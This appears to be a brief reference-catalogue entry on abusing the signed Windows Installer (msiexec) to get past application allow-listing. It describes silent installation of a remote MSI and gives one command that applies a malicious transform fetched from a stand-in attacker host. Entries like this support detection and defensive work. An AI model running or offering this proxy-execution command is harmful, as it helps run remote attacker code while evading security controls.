Execute
NEW ExecutionAWL / Policy Bypass Windows
The signed Windows Installer fetches and silently installs a remote MSI; the package's custom actions run arbitrary code under the trusted msiexec host. A signed vendor MSI can also be paired with a malicious remote transform: msiexec /i C:\Windows\Temp\x.msi TRANSFORMS="https://attacker.example/x.mst" /qb.
Use Proxy execution of attacker code through a trusted, signed installer, including from a remote URL.